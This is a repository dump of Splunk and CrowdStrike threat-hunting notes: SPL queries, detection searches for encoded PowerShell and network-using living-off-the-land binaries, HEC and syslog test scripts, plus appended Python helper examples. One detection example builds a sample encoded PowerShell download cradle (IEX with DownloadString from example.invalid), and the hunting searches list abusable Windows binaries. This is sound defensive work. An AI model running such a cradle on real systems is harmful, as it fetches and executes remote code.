├── LICENSE ├── README.md ├── crowdstrile-spl.md ├── dashboard-link.xml ├── fun.spl ├── helpful_regex.md ├── hidedashboardwithnoresults.xml ├── splunk-cim.spl ├── splunk-hec-check.py ├── splunk_template_view.md ├── test_syslog-ng.py ├── test_syslog.sh └── working-splunk-hec-check.py /LICENSE: -------------------------------------------------------------------------------- 1 | Creative Commons Legal Code 2 | 3 | CC0 1.0 Universal 4 | 5 | CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE 6 | LEGAL SERVICES. DISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE AN 7 | ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS 8 | INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES 9 | REGARDING THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS 10 | PROVIDED HEREUNDER, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM 11 | THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED 12 | HEREUNDER. 13 | 14 | Statement of Purpose 15 | 16 | The laws of most jurisdictions throughout the world automatically confer 17 | exclusive Copyright and Related Rights (defined below) upon the creator 18 | and subsequent owner(s) (each and all, an "owner") of an original work of 19 | authorship and/or a database (each, a "Work"). 20 | 21 | Certain owners wish to permanently relinquish those rights to a Work for 22 | the purpose of contributing to a commons of creative, cultural and 23 | scientific works ("Commons") that the public can reliably and without fear 24 | of later claims of infringement build upon, modify, incorporate in other 25 | works, reuse and redistribute as freely as possible in any form whatsoever 26 | and for any purposes, including without limitation commercial purposes. 
27 | These owners may contribute to the Commons to promote the ideal of a free 28 | culture and the further production of creative, cultural and scientific 29 | works, or to gain reputation or greater distribution for their Work in 30 | part through the use and efforts of others. 31 | 32 | For these and/or other purposes and motivations, and without any 33 | expectation of additional consideration or compensation, the person 34 | associating CC0 with a Work (the "Affirmer"), to the extent that he or she 35 | is an owner of Copyright and Related Rights in the Work, voluntarily 36 | elects to apply CC0 to the Work and publicly distribute the Work under its 37 | terms, with knowledge of his or her Copyright and Related Rights in the 38 | Work and the meaning and intended legal effect of CC0 on those rights. 39 | 40 | 1. Copyright and Related Rights. A Work made available under CC0 may be 41 | protected by copyright and related or neighboring rights ("Copyright and 42 | Related Rights"). Copyright and Related Rights include, but are not 43 | limited to, the following: 44 | 45 | i. the right to reproduce, adapt, distribute, perform, display, 46 | communicate, and translate a Work; 47 | ii. moral rights retained by the original author(s) and/or performer(s); 48 | iii. publicity and privacy rights pertaining to a person's image or 49 | likeness depicted in a Work; 50 | iv. rights protecting against unfair competition in regards to a Work, 51 | subject to the limitations in paragraph 4(a), below; 52 | v. rights protecting the extraction, dissemination, use and reuse of data 53 | in a Work; 54 | vi. database rights (such as those arising under Directive 96/9/EC of the 55 | European Parliament and of the Council of 11 March 1996 on the legal 56 | protection of databases, and under any national implementation 57 | thereof, including any amended or successor version of such 58 | directive); and 59 | vii. 
other similar, equivalent or corresponding rights throughout the 60 | world based on applicable law or treaty, and any national 61 | implementations thereof. 62 | 63 | 2. Waiver. To the greatest extent permitted by, but not in contravention 64 | of, applicable law, Affirmer hereby overtly, fully, permanently, 65 | irrevocably and unconditionally waives, abandons, and surrenders all of 66 | Affirmer's Copyright and Related Rights and associated claims and causes 67 | of action, whether now known or unknown (including existing as well as 68 | future claims and causes of action), in the Work (i) in all territories 69 | worldwide, (ii) for the maximum duration provided by applicable law or 70 | treaty (including future time extensions), (iii) in any current or future 71 | medium and for any number of copies, and (iv) for any purpose whatsoever, 72 | including without limitation commercial, advertising or promotional 73 | purposes (the "Waiver"). Affirmer makes the Waiver for the benefit of each 74 | member of the public at large and to the detriment of Affirmer's heirs and 75 | successors, fully intending that such Waiver shall not be subject to 76 | revocation, rescission, cancellation, termination, or any other legal or 77 | equitable action to disrupt the quiet enjoyment of the Work by the public 78 | as contemplated by Affirmer's express Statement of Purpose. 79 | 80 | 3. Public License Fallback. Should any part of the Waiver for any reason 81 | be judged legally invalid or ineffective under applicable law, then the 82 | Waiver shall be preserved to the maximum extent permitted taking into 83 | account Affirmer's express Statement of Purpose. 
In addition, to the 84 | extent the Waiver is so judged Affirmer hereby grants to each affected 85 | person a royalty-free, non transferable, non sublicensable, non exclusive, 86 | irrevocable and unconditional license to exercise Affirmer's Copyright and 87 | Related Rights in the Work (i) in all territories worldwide, (ii) for the 88 | maximum duration provided by applicable law or treaty (including future 89 | time extensions), (iii) in any current or future medium and for any number 90 | of copies, and (iv) for any purpose whatsoever, including without 91 | limitation commercial, advertising or promotional purposes (the 92 | "License"). The License shall be deemed effective as of the date CC0 was 93 | applied by Affirmer to the Work. Should any part of the License for any 94 | reason be judged legally invalid or ineffective under applicable law, such 95 | partial invalidity or ineffectiveness shall not invalidate the remainder 96 | of the License, and in such case Affirmer hereby affirms that he or she 97 | will not (i) exercise any of his or her remaining Copyright and Related 98 | Rights in the Work or (ii) assert any associated claims and causes of 99 | action with respect to the Work, in either case contrary to Affirmer's 100 | express Statement of Purpose. 101 | 102 | 4. Limitations and Disclaimers. 103 | 104 | a. No trademark or patent rights held by Affirmer are waived, abandoned, 105 | surrendered, licensed or otherwise affected by this document. 106 | b. Affirmer offers the Work as-is and makes no representations or 107 | warranties of any kind concerning the Work, express, implied, 108 | statutory or otherwise, including without limitation warranties of 109 | title, merchantability, fitness for a particular purpose, non 110 | infringement, or the absence of latent or other defects, accuracy, or 111 | the present or absence of errors, whether or not discoverable, all to 112 | the greatest extent permissible under applicable law. 113 | c. 
Affirmer disclaims responsibility for clearing rights of other persons 114 | that may apply to the Work or any use thereof, including without 115 | limitation any person's Copyright and Related Rights in the Work. 116 | Further, Affirmer disclaims responsibility for obtaining any necessary 117 | consents, permissions or other rights required for any use of the 118 | Work. 119 | d. Affirmer understands and acknowledges that Creative Commons is not a 120 | party to this document and has no duty or obligation with respect to 121 | this CC0 or use of the Work. 122 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: page 3 | title: "Splunk Cheatsheet" 4 | permalink: /spl 5 | --- 6 | 7 | ## Splunk Quick Cheat Sheet 8 | 9 | **DNS Lookup** 10 | ``` 11 | | lookup dnslookup clientip as dest_ip OUTPUT clienthost as dest_host 12 | ``` 13 | **DNS Independent IP Resolution** 14 | ``` 15 | | inputlookup tHostInfo 16 | | search src_ip=$IPADDRESS$ OR src_host=$HOSTNAME$ 17 | ``` 18 | 19 | **Event Frequency** 20 | ``` 21 | | stats count by signature 22 | `comment("set days to the number of days covered by the search window")` 23 | | eval days = 10 24 | | eval events_perShift = round(count / ((days * 24)/4),3) 25 | | eval events_perDay = round(count / days,2) 26 | | eval events_perWeek = round(count / (days / 7),2) 27 | | sort - count 28 | | fields - count days 29 | | table signature events_perShift events_perDay events_perWeek 30 | | addcoltotals labelfield=signature label=Total 31 | ``` 32 | 33 | **Get the earliest and latest time for an observed field value** 34 | ``` 35 | | stats earliest(_time) as firstTime latest(_time) as lastTime by dest 36 | | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") 37 | | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") 38 | ``` 39 | 40 | **List All Available Indexes with Events** 41 | ``` 42 | | eventcount summarize=false index=* 43 | 
search count!=0 44 | | dedup index 45 | | fields - server 46 | ``` 47 | **List All Available Non-Internal Indexes with Events** 48 | ``` 49 | | eventcount summarize=false index=* 50 | | search count!=0 NOT index IN (audit_summary, cim_modactions, endpoint_summary, lastchanceindex, notable, notable_summary, risk, summary, tc_app_logs, threat_activity) 51 | | dedup index 52 | | fields - server 53 | ``` 54 | 55 | **List All Available Sourcetypes in an Index** 56 | ``` 57 | | metadata type=sourcetypes index=foo 58 | | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") 59 | | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") 60 | | eval recentTime=strftime(recentTime,"%Y-%m-%d %H:%M:%S") 61 | ``` 62 | 63 | **Better FieldSummary with Event Coverage** (count is the number of events carrying each field, so max(count) approximates the event total) 64 | ``` 65 | index=pa_log sourcetype="pan:traffic" | fieldsummary 66 | | eventstats max(count) as total 67 | | eval event_coverage = round(((count / total)*100),2)."%" 68 | ``` 69 | 70 | **Lower case all fields** 71 | ``` 72 | | foreach * [eval <<FIELD>>=lower('<<FIELD>>')] 73 | ``` 74 | 75 | **Make time human readable** 76 | ``` 77 | | eval mytime=strftime(_time,"%Y-%m-%d %H:%M:%S") 78 | ``` 79 | 80 | **Remove Domain from Device** (keeps everything before the first dot; name the capture group whatever field you want, `host` here) 81 | ``` 82 | | rex field=dest "^(?<host>[^\.]+)" 83 | ``` 84 | 85 | **Normalize User Field from WinEventlog** (strips a `DOMAIN\` prefix and lower-cases the rest) 86 | ``` 87 | | eval user=lower(if(match(user,".*\\\\.*"), replace(user,".*\\\\",""), user)) 88 | ``` 89 | 90 | **Get current user context** 91 | ``` 92 | | rest /services/authentication/current-context splunk_server=local 93 | ``` 94 | 95 | **Group By Octet**
96 | ***2 Octets*** 97 | ``` 98 | | rex field=src_ip "^(?<subnet>\d+\.\d+)\.\d+\.\d+" 99 | | stats count by subnet 100 | ``` 101 | ***3 Octets*** 102 | ``` 103 | | rex field=ip "^(?<subnet>\d+\.\d+\.\d+)\.\d+" 104 | | stats count by subnet 105 | ``` 106 | 107 | **Use of now** 108 | ``` 109 | | eval yesterday=relative_time(now(), "-1d@d") 110 | ``` 111 | 112 | **Turn a field into csv format** 113 | ``` 114 | | fields mv_foo 115 | | mvcombine mv_foo delim="," 116 | | nomv mv_foo 117 | ``` 118 | 119 | **Turn a field into csv format 2** 120 | ``` 121 | | fields mv_foo 122 | | eval mv_foo_csv = mvjoin(mv_foo,", ") 123 | ``` 124 | 125 | **Expand a multivalued field into one event per value** (makemv first when the values arrive as one delimited string) 126 | ``` 127 | | fields foo 128 | | makemv delim="," foo 129 | | mvexpand foo 130 | ``` 131 | 132 | **Sankey Multistaged**
133 | ***2 staged*** 134 | ``` 135 | | table src_ip dest_port dest_ip 136 | | appendpipe [stats count by src_ip dest_port | rename src_ip as source, dest_port as target] 137 | | appendpipe [stats count by dest_port dest_ip | rename dest_port as source, dest_ip as target] 138 | | search source=* 139 | | fields source target count 140 | ``` 141 | ***3 staged*** 142 | ``` 143 | | table src_ip signature category dest_ip 144 | | appendpipe [stats count by src_ip signature | rename src_ip as source, signature as target] 145 | | appendpipe [stats count by signature category | rename signature as source, category as target] 146 | | appendpipe [stats count by category dest_ip | rename category as source, dest_ip as target] 147 | | search source=* 148 | | fields source target count 149 | ``` 150 | 151 | **Search time in a lookup**
152 | Incident Review is used as an example 153 | ``` 154 | | inputlookup incident_review_lookup 155 | | addinfo 156 | | eval yesterday=relative_time(now(), "-1d@d") 157 | | where (time >= yesterday AND time <= info_max_time) 158 | ``` 159 | 160 | **Find hosts that have not checked in within a specified amount of time** 161 | ``` 162 | | stats latest(_time) as lastTime earliest(_time) as firstTime by hostnames 163 | `comment("change -30d to the cutoff after which an asset counts as missing")` 164 | | eval recent = if(lastTime > relative_time(now(),"-30d"),1,0), realLatest = strftime(lastTime,"%c") 165 | | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") 166 | | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") 167 | | where recent=0 168 | ``` 169 | 170 | **Join** (with no field list the join uses every field both result sets share; max=0 keeps all subsearch matches instead of only the first) 171 | ``` 172 | search | join type=inner 173 | | join type=left max=0 174 | | join type=inner overwrite=false genre_id 175 | [| {search} | rename id as genre_id ] 176 | ``` 177 | 178 | **CPE Extraction** (the mvindex positions assume CPE 2.2 URIs, `cpe:/a:vendor:product:version:update`; CPE 2.3 strings start with `cpe:2.3:a:`, so every index shifts by one) 179 | ``` 180 | .... 
spl filtering 181 | | dedup agent_names 182 | | fields installed_software{} agent_names sourcetype 183 | | rename installed_software{} as installed_software 184 | | mvexpand installed_software 185 | | eval installed_software1 = split(installed_software,":") 186 | | eval vendor = mvindex(installed_software1,2) 187 | | eval product = mvindex(installed_software1,3) 188 | | eval version = mvindex(installed_software1,4) 189 | | eval service_pack = mvindex(installed_software1,5) 190 | | rename installed_software as cpe 191 | | table agent_names product vendor version service_pack cpe 192 | ``` 193 | -------------------------------------------------------------------------------- /crowdstrile-spl.md: -------------------------------------------------------------------------------- 1 | 2 | ## DNS Record Lookup 3 | `sourcetype=DnsRequestV4* DomainName=<domain>` 4 | 5 | ## CrowdStrike search for meaningful user logons 6 | ``` 7 | index=main ComputerName=* sourcetype="UserLogonV8-v02" 8 | NOT UserName IN ("DWM*","UMFD*") 9 | NOT LogonType_decimal IN (0,5) 10 | | eval logon_type = case(LogonType_decimal==2,"Interactive", 11 | LogonType_decimal==3,"Network", 12 | LogonType_decimal==4,"Batch", 13 | LogonType_decimal==5,"Service", 14 | LogonType_decimal==6,"Proxy", 15 | LogonType_decimal==7,"Unlock", 16 | LogonType_decimal==8,"NetworkCleartext", 17 | LogonType_decimal==9,"NewCredentials", 18 | LogonType_decimal==10,"RemoteInteractive", 19 | LogonType_decimal==11,"CachedInteractive", 20 | LogonType_decimal==12,"CachedRemoteInteractive", 21 | LogonType_decimal==13,"CachedUnlock", 22 | true(),"unknown") 23 | | eval IP4 = coalesce(RemoteAddressIP4, LocalAddressIP4) 24 | | table _time UserName logon_type IP4 ComputerName 25 | ``` 26 | 27 | ## Encoded PowerShell 28 | ``` 29 | event_simpleName=ProcessRollup2 FileName=powershell.exe CommandLine IN (*-enc*,*encoded*) 30 | ``` 31 | powershell.exe also takes the short forms `-e` and `-ec` for `-EncodedCommand`, and `pwsh.exe` or a renamed copy never matches `FileName=powershell.exe`, so widen both filters when you need coverage rather than a quick look. 32 | 33 | ## Improper Local System Account Usage 34 | ``` 35 | event_simpleName="ProcessRollup2" FileName IN (w3wp.exe,sqlservr.exe,httpd.exe,nginx.exe) UserName="LOCAL SYSTEM" 36 | ``` 37 | 38 | ## Renamed Executable Execution 39 | Process IDs and file paths repeat across hosts, so the joins below and in the next section include `aid` (the Falcon agent ID) to keep each match on one machine. 40 | ``` 41 | event_simpleName="NewExecutableRenamed" 42 | | rename TargetFileName as ImageFileName 43 | | join aid ImageFileName 44 |     [ search event_simpleName="ProcessRollup2" ] 45 | | table ComputerName SourceFileName ImageFileName CommandLine 46 | ``` 47 | 48 | ## LOL Binaries with Network 49 | ``` 50 | event_simpleName="DnsRequest" 51 | | rename ContextProcessId as TargetProcessId 52 | | join aid TargetProcessId 53 |     [ search event_simpleName="ProcessRollup2" FileName IN (Atbroker.exe, Bash.exe, Bitsadmin.exe, Certutil.exe, Cmd.exe, Cmstp.exe, Control.exe, Cscript.exe, Csc.exe, Dfsvc.exe, Diskshadow.exe, Dnscmd.exe, Esentutl.exe, Eventvwr.exe, Expand.exe, Extexport.exe, Extrac32.exe, Findstr.exe, Forfiles.exe, Ftp.exe, Gpscript.exe, Hh.exe, Ie4uinit.exe, Ieexec.exe, Infdefaultinstall.exe, Installutil.exe, Jsc.exe, Makecab.exe, Mavinject.exe, Mmc.exe, Msconfig.exe, Msdt.exe, Mshta.exe, Msiexec.exe, Odbcconf.exe, Pcalua.exe, Pcwrun.exe, Presentationhost.exe, Print.exe, Regasm.exe, Regedit.exe, Register-cimprovider.exe, Regsvcs.exe, Regsvr32.exe, Reg.exe, Replace.exe, Rpcping.exe, Rundll32.exe, Runonce.exe, Runscripthelper.exe, Schtasks.exe, Scriptrunner.exe, Sc.exe, SyncAppvPublishingServer.exe, Verclsid.exe, Wab.exe, Wmic.exe, Wscript.exe, Wsreset.exe, Xwizard.exe) ] 54 | ``` 55 | 56 | ## Static Behavior Model 57 | ``` 58 | event_simpleName=ProcessRollup2 59 | | join aid TargetProcessId_decimal 60 |     [search DetectName=SuspiciousFileWindows] 61 | | eval ProcessStartTime=strftime(ProcessStartTime_decimal,"%m/%d/%y %H:%M:%S") 62 | | table ProcessStartTime aid ComputerName UserName ImageFileName OriginalFilename SHA256HashData ParentBaseFileName 63 | ``` 64 | -------------------------------------------------------------------------------- /dashboard-link.xml: 
-------------------------------------------------------------------------------- 1 | 2 | foo 3 | 4 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /fun.spl: -------------------------------------------------------------------------------- 1 | `comment("fun severity")` 2 | | eval severity = case( 3 | severity="Critical", "┻━┻︵ \(°□°)/ ︵ ┻━┻ ".severity, 4 | severity="High", "(╯°□°)╯ ︵ ┻━┻ ".severity, 5 | severity="Medium", "ಠ_ಠ ".severity, 6 | severity="Low", "(っ◕‿◕)っ ".severity, 7 | severity="Informational", "♥‿♥ ".severity, 8 | true(), severity 9 | ) 10 | -------------------------------------------------------------------------------- /helpful_regex.md: -------------------------------------------------------------------------------- 1 | 2 | # Asset Related Information 3 | Pull IPv4 (name the capture group as you like, `ip` here) - "(?<ip>([0-9]{1,3}\.){3}[0-9]{1,3})$" 4 | The pattern accepts any dotted quad, including out-of-range octets such as 999.1.1.1, and the `$` anchors it to the end of the field; drop the anchor to find addresses mid-string and validate the octets afterwards if that matters. 5 | -------------------------------------------------------------------------------- /hidedashboardwithnoresults.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | sourcetype=* 5 | 6 | 7 | 8 | 9 | 10 | true 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /splunk-cim.spl: -------------------------------------------------------------------------------- 1 | 2 | ### Report: find all indexes to whitelist based on available tags 3 | index=* tag IN (authentication,alert,certificate,change,database,dlp,email,ids,attack,inventory,malware,operations,network,resolution,dns,session,communicate,performance,report,vulnerabilities,update,status,web) 4 | | stats values(index) as index by tag 5 | -------------------------------------------------------------------------------- /splunk-hec-check.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # Check that a Splunk Cloud HTTP Event Collector (HEC) token and hostname are reachable. 3 | import getpass 4 | import uuid 5 | 6 | import requests 7 | 8 | ## define your variables 9 | # HEC token, read without echo so it stays out of the terminal scroll-back 10 | token = getpass.getpass("Input Token: ") 11 | # company's hostname (the part before .splunkcloud.com) 12 | company = input("Input Company Hostname: ") 13 | # HEC sends the token in a header, so only https is acceptable 14 | protocol = "https" 15 | # cloud customers have `http-inputs-` before hostname 16 | host = "http-inputs-" + company + ".splunkcloud.com" 17 | # endpoint = collector or collector/raw 18 | endpoint = "/services/collector" 19 | 20 | # generated url 21 | url = protocol + "://" + host + endpoint 22 | 23 | # a channel is only needed when the token has indexer acknowledgment enabled; any GUID 24 | # works, and sending it as a header keeps the token itself out of the URL and proxy logs 25 | headers = { 26 |     "Authorization": "Splunk {}".format(token), 27 |     "X-Splunk-Request-Channel": str(uuid.uuid4()), 28 | } 29 | 30 | # never use verify=False to get past a bad cert; pass verify="/path/to/ca-bundle.pem" instead 31 | r = requests.post(url, headers=headers, timeout=10) 32 | 33 | # you should receive '{"text":"No data","code":5}' if inputs are working 34 | print(r.status_code, r.text) 35 | -------------------------------------------------------------------------------- /splunk_template_view.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | I frequently find myself trying to remember what is required for a new view creation. 4 | 5 | 6 | 7 | 8 | -24h@h 9 | now 10 | 11 | 12 | 
13 |
14 | -------------------------------------------------------------------------------- /test_syslog-ng.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # simple script to test a syslog-ng TCP input. 3 | import socket 4 | 5 | dest_ip = input("Input the IP of the Syslog-ng Server: ") 6 | dest_port = int(input("Input the port for Syslog-ng ingestion: ")) 7 | hostname = socket.gethostname() 8 | message = input("Message (Optional): ") 9 | 10 | # <14> is PRI = facility user (1) * 8 + severity info (6); the trailing newline terminates 11 | # the record, and syslog-ng will not parse a TCP message until it sees one 12 | content = f'<14>Test Syslog-ng pipeline over {dest_port} to {dest_ip} from {hostname}. "message":"{message}"\n' 13 | 14 | s = socket.create_connection((dest_ip, dest_port), timeout=5) 15 | s.sendall(content.encode()) 16 | s.close() 17 | 18 | print("Sent message:", content.rstrip("\n")) 19 | -------------------------------------------------------------------------------- /test_syslog.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # echo "<14>_sourcehost_ messagetext" | nc -v <host> <port> 3 | printf 'Input destination IP or hostname: ' 4 | read -r dest 5 | printf 'Input destination port: ' 6 | read -r dest_port 7 | # quote the variables so nc receives their values rather than the literal words dest and dest_port 8 | echo "<14>localhost testing syslog-ng" | nc -v "$dest" "$dest_port" 9 | -------------------------------------------------------------------------------- /working-splunk-hec-check.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # Check that a Splunk Cloud HEC token and hostname are reachable (working version). 3 | import getpass 4 | import uuid 5 | 6 | import requests 7 | 8 | ## define your variables 9 | # HEC token, read without echo so it stays out of the terminal scroll-back 10 | token = getpass.getpass("Input HEC Token: ") 11 | # company's hostname (the part before .splunkcloud.com) 12 | company = input("Input company's Splunk Cloud Hostname: ") 13 | # HEC sends the token in a header, so only https is acceptable 14 | protocol = "https" 15 | # cloud customers have `http-inputs-` before hostname 16 | host = "http-inputs-" + company + ".splunkcloud.com" 17 | # endpoint = collector or collector/raw 18 | endpoint = "/services/collector" 19 | 20 | # generated url 21 | url = f"{protocol}://{host}{endpoint}" 22 | 23 | # a channel is only needed when the token has indexer acknowledgment enabled; any GUID 24 | # works, and sending it as a header keeps the token itself out of the URL and proxy logs 25 | headers = { 26 |     "Authorization": f"Splunk {token}", 27 |     "X-Splunk-Request-Channel": str(uuid.uuid4()), 28 | } 29 | 30 | # never use verify=False to get past a bad cert; pass verify="/path/to/ca-bundle.pem" instead 31 | r = requests.post(url, headers=headers, timeout=10) 32 | 33 | print('You should receive \'{"text":"No data","code":5}\' if inputs are working.') 34 | print('Result:', r.status_code, r.text) 35 | --------------------------------------------------------------------------------
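The `CPE Extraction` snippet in README.md splits `installed_software` on `:` and reads vendor, product, version and update by position, which only lines up for CPE 2.2 URIs. The parser below is an added example written for this page, not code from the repository: it applies the same idea to both CPE 2.2 URIs and CPE 2.3 formatted strings, honours the backslash escapes that 2.3 allows inside a component, and turns a constructed inventory sample shaped like the README's `installed_software{}` events into the same columns the SPL `table` produces. The inventory rows, agent names and CPE strings are made up for the example.

```python
# Added example for the README "CPE Extraction" snippet; not code from the repository.
# Component order shared by CPE 2.2 URIs ("cpe:/part:vendor:product:version:update:edition:language")
# and CPE 2.3 formatted strings ("cpe:2.3:part:vendor:product:version:update:edition:language:
# sw_edition:target_sw:target_hw:other").
FIELDS_22 = ["part", "vendor", "product", "version", "update", "edition", "language"]
FIELDS_23 = FIELDS_22 + ["sw_edition", "target_sw", "target_hw", "other"]


def split_unescaped(text, sep=":"):
    """Split on sep while honouring backslash escapes (CPE 2.3 writes a literal colon as '\\:')."""
    parts, buf, i = [], [], 0
    while i < len(text):
        ch = text[i]
        if ch == "\\" and i + 1 < len(text):
            buf.append(text[i + 1])  # keep the escaped character, drop the backslash
            i += 2
            continue
        if ch == sep:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
        i += 1
    parts.append("".join(buf))
    return parts


def parse_cpe(cpe):
    """Return the CPE components as a dict, or None when the string is not a CPE name.

    Wildcard ('*'), not-applicable ('-') and empty components come back as None, so
    `version is None` means "unknown" regardless of which CPE dialect produced the string.
    """
    if cpe.startswith("cpe:2.3:"):
        comps, names, dialect = split_unescaped(cpe[len("cpe:2.3:"):]), FIELDS_23, "2.3"
    elif cpe.startswith("cpe:/"):
        # 2.2 URIs percent-encode special characters, so a plain split is correct here
        comps, names, dialect = cpe[len("cpe:/"):].split(":"), FIELDS_22, "2.2"
    else:
        return None
    if not comps or comps[0] not in ("a", "h", "o"):
        return None
    padded = comps + [None] * (len(names) - len(comps))
    out = {"cpe_version": dialect}
    for name, value in zip(names, padded):
        out[name] = None if value in (None, "", "*", "-") else value
    return out


# Constructed sample shaped like the README's inventory events (field names are assumed).
SAMPLE_EVENTS = [
    {"agent_names": "ws-01", "installed_software{}": [
        "cpe:/a:microsoft:internet_explorer:8.0.6001:beta",
        "cpe:2.3:a:openbsd:openssh:9.6:p1:*:*:*:*:*:*",
    ]},
    {"agent_names": "srv-02", "installed_software{}": [
        "cpe:2.3:a:acme\\:corp:agent:1.2.3:-:*:*:*:*:*:*",
        "not-a-cpe-string",
    ]},
]


def inventory_table(events):
    """Mirror the README pipeline (mvexpand + split + table), skipping strings that are not CPEs."""
    rows = []
    for ev in events:
        for cpe in ev["installed_software{}"]:
            parsed = parse_cpe(cpe)
            if parsed is None:
                continue
            rows.append({
                "agent_names": ev["agent_names"],
                "vendor": parsed["vendor"],
                "product": parsed["product"],
                "version": parsed["version"],
                "service_pack": parsed["update"],
                "cpe": cpe,
            })
    return rows
```

`inventory_table(SAMPLE_EVENTS)` yields one row per valid CPE with the same column names as the SPL `table`; the non-CPE string is dropped rather than producing a row of empty fields, which is what `mvindex` on a short split would give you in Splunk.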
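The `Encoded PowerShell` search in crowdstrile-spl.md only finds the events; the analyst still has to decode the payload to see what ran. The script below is an added example written for this page, not code from the repository. It recognises every prefix PowerShell accepts for `-EncodedCommand` (including the `-e` and `-ec` short forms the SPL wildcard misses), decodes the UTF-16LE base64 payload, and runs a small indicator check over both the decoded script and the outer command line. The `ProcessRollup2`-style events, the command lines and the indicator list are constructed for the example.

```python
# Added example for the "Encoded PowerShell" search in crowdstrile-spl.md; not code from the repository.
import base64
import binascii

# Indicators looked for in the decoded script and the surrounding command line (chosen for the example).
INDICATORS = ("IEX", "Invoke-Expression", "DownloadString", "FromBase64String",
              "Net.WebClient", "-nop", "hidden")


def encode_powershell(script):
    """Produce the UTF-16LE base64 form that powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def is_encoded_flag(token):
    """True for -EncodedCommand and every prefix PowerShell resolves to it (-e, -ec, -enc, ...)."""
    if token[:1] not in ("-", "/"):
        return False
    name = token.lstrip("-/").lower()
    return len(name) >= 1 and "encodedcommand".startswith(name)


def find_encoded_payload(command_line):
    """Return (token_index, payload) for the first encoded-command flag, or None."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            return i + 1, tokens[i + 1].strip("\"'")
    return None


def decode_payload(payload):
    """Base64 -> UTF-16LE text; None when the blob is not a well-formed encoded command."""
    try:
        return base64.b64decode(payload, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def decode_encoded_command(command_line):
    found = find_encoded_payload(command_line)
    return decode_payload(found[1]) if found else None


# Constructed ProcessRollup2-style events; the command lines are made up for the example.
SAMPLE_EVENTS = [
    {"ComputerName": "WS01", "FileName": "powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -e " + encode_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")},
    {"ComputerName": "WS02", "FileName": "powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"ComputerName": "WS03", "FileName": "pwsh.exe",
     "CommandLine": "pwsh.exe -EncodedCommand " + encode_powershell("Get-Date")},
]


def triage(events):
    """Decode each event's payload and report which indicators appear in it or around it."""
    findings = []
    for ev in events:
        found = find_encoded_payload(ev["CommandLine"])
        if not found:
            continue
        decoded = decode_payload(found[1])
        if decoded is None:
            continue
        # match against the command line minus the base64 blob, so random base64 letters cannot hit
        tokens = ev["CommandLine"].split()
        outer = " ".join(t for i, t in enumerate(tokens) if i != found[0])
        haystack = (outer + " " + decoded).lower()
        hits = [ind for ind in INDICATORS if ind.lower() in haystack]
        findings.append({"ComputerName": ev["ComputerName"], "decoded": decoded, "indicators": hits})
    return findings
```

`triage(SAMPLE_EVENTS)` returns WS01 (download cradle with `-NoP -W Hidden`) and WS03 (harmless `Get-Date`, no indicators) and skips WS02, whose command line has no encoded payload at all; in practice you would feed it the `CommandLine` values the SPL search returns.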
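splunk-hec-check.py and working-splunk-hec-check.py print the raw HEC reply and leave it to the reader to know that `{"text":"No data","code":5}` is good news. The module below is an added example written for this page, not code from the repository: it builds the same Splunk Cloud URL and headers, adds a proper event body for a real send, and classifies any HEC reply by its documented `code` so a script can tell "token rejected" from "token fine, payload wrong" from "server trouble". The `hec:check` sourcetype, the `ca_bundle` parameter and the company names are assumptions; only `post_check` touches the network, and it imports `requests` lazily so everything else runs offline.

```python
# Added example for splunk-hec-check.py / working-splunk-hec-check.py; not code from the repository.
import json
import uuid

# HEC reply codes as documented for the collector endpoint; the "text" field carries the same label.
HEC_CODES = {
    0: "Success", 1: "Token disabled", 2: "Token is required", 3: "Invalid authorization",
    4: "Invalid token", 5: "No data", 6: "Invalid data format", 7: "Incorrect index",
    8: "Internal server error", 9: "Server is busy", 10: "Data channel is missing",
    11: "Invalid data channel", 12: "Event field is required", 13: "Event field cannot be blank",
    14: "ACK is disabled", 15: "Error in handling indexed fields",
    16: "Query string authorization is not enabled",
}
AUTH_CODES = {1, 2, 3, 4}
SERVER_CODES = {8, 9}


def hec_url(company, endpoint="/services/collector"):
    """Splunk Cloud HEC URL; https only, because the token travels in a header."""
    return f"https://http-inputs-{company}.splunkcloud.com{endpoint}"


def hec_headers(token, use_ack=False):
    """Authorization header plus a fresh channel GUID when indexer acknowledgment is on."""
    headers = {"Authorization": f"Splunk {token}"}
    if use_ack:
        headers["X-Splunk-Request-Channel"] = str(uuid.uuid4())
    return headers


def hec_event_dict(event, sourcetype, index=None, host=None, time=None):
    """Body for /services/collector: the event plus the optional routing metadata HEC accepts."""
    body = {"event": event, "sourcetype": sourcetype}
    if index is not None:
        body["index"] = index
    if host is not None:
        body["host"] = host
    if time is not None:
        body["time"] = time  # epoch seconds, may be fractional
    return body


def interpret(status_code, body):
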